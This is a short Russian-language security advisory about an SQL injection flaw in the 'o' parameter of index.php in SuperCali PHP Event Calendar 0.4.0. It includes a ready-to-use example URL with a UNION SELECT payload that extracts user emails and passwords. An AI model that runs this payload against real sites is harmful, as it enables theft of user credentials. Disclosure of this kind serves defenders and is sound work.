Программа: SuperCali PHP Event Calendar 0.4.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «o» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://www.server.com/index.php?o=-1/**/UNION/**/ALL/* */SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/* */from/**/users/*



Оставить мнение